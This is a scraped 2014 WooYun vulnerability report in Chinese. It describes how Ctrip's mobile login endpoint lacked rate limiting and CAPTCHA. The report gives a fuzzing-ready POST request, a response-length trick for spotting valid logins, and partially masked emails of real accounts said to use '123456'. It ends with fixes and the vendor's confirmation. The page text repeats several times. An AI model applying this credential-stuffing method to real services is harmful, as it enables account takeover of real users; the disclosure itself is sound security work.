携程某接口设计缺陷可进行扫号（可获取大量账号密码）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-075056

漏洞标题：携程某接口设计缺陷可进行扫号（可获取大量账号密码）

漏洞作者： niliu

提交时间：2014-09-04 19:33

修复时间：2014-10-24 19:36

公开时间：2014-10-24 19:36

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-09-04：该漏洞正等待厂商内部评估
2014-09-04：厂商已经确认，与白帽子共同解决该漏洞中，漏洞信息仅向厂商公开
2014-09-24：细节向核心白帽子及相关领域专家公开
2014-10-04：细节向普通白帽子公开
2014-10-14：细节向实习白帽子公开
2014-10-24：细节向公众公开

简要描述：

接口限制总有遗漏，涉及用户数据，提交！

详细说明：

问题接口出现在携程触屏版登陆

http://m.ctrip.com/html5/Account/Login.html

经简单测试发现登陆没有错误次数限制，也不会弹出验证码。
于是随便输入用户名，密码。登陆时抓包进行fuzz
抓包数据

POST /html5/Account/LoginValidation HTTP/1.1
Host: m.ctrip.com
Proxy-Connection: keep-alive
Content-Length: 292
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Origin: http://m.ctrip.com
User-Agent: Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X; en-us) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
DNT: 1
Referer: http://m.ctrip.com/html5/Account/Login.html
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN
Cookie: 
UID=§admin§&Password=2ec5ed31996e031281e8da203fa1a2851921cbb7b2cd27bdf4a0ab9fe430f035391638c46e25e821035b5ff71a08b84cb9eaa7573d5988122483ec14ca2331c42e61bb74ff7d1b6853bafaf9b09c376a462fa3c8a582e752b2fcff9dcdf3af080558daea8fd973afd92b4b42e2c64377e5876257484eb4a671c3b83cc315d138&IsRemember=false

可以看到密码是经过加密的。
我就以密码不变，随便找个最简单的弱口令123456来进行测试
测试一部分邮箱账号。

返回包402的为密码错误，大于402的都是可以登陆的
贴出部分证明

guo
b***[email protected]
c***[email protected]
e***[email protected]
s***[email protected]
9***[email protected]
l***[email protected]
e***@126.com
lx***[email protected]
s***[email protected]
5***[email protected]
n***[email protected]
***[email protected]
z***[email protected]
de***[email protected]
13***[email protected]
46***[email protected]
l***[email protected]
s***[email protected]
x***[email protected]
mu***@126.com
so***[email protected]
4***[email protected]
ho***[email protected]
i***[email protected]
j***[email protected]
and***[email protected]
j***[email protected]
hu***[email protected]
2***[email protected]
7***[email protected]
pr***[email protected]
l***@163.com
54***[email protected]
chi***[email protected]

以上这些账号密码均为123456,。
贴部分登陆证明
b***[email protected]

5***[email protected]

hu***[email protected]

g**

漏洞证明：

综上所述，密码可以变换其他的来进行测试。
在大数据时代，基于之前泄露的各种用户数据进行测试，影响用户数量还是很可观的.

修复方案：

对触屏版登陆接口进行登陆次数限制。
加入验证码进行限制。

版权声明：转载请注明来源 niliu@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2014-09-04 19:35

厂商回复：

漏洞已确认真实存在，并已安排人处理。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-075056

漏洞标题：携程某接口设计缺陷可进行扫号（可获取大量账号密码）

相关厂商：携程旅行网

漏洞作者： niliu

提交时间：2014-09-04 19:33

修复时间：2014-10-24 19:36

公开时间：2014-10-24 19:36

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 niliu@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-075056

漏洞标题：携程某接口设计缺陷可进行扫号（可获取大量账号密码）

相关厂商：携程旅行网

漏洞作者： niliu

提交时间：2014-09-04 19:33

修复时间：2014-10-24 19:36

公开时间：2014-10-24 19:36

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-075056"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 niliu@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：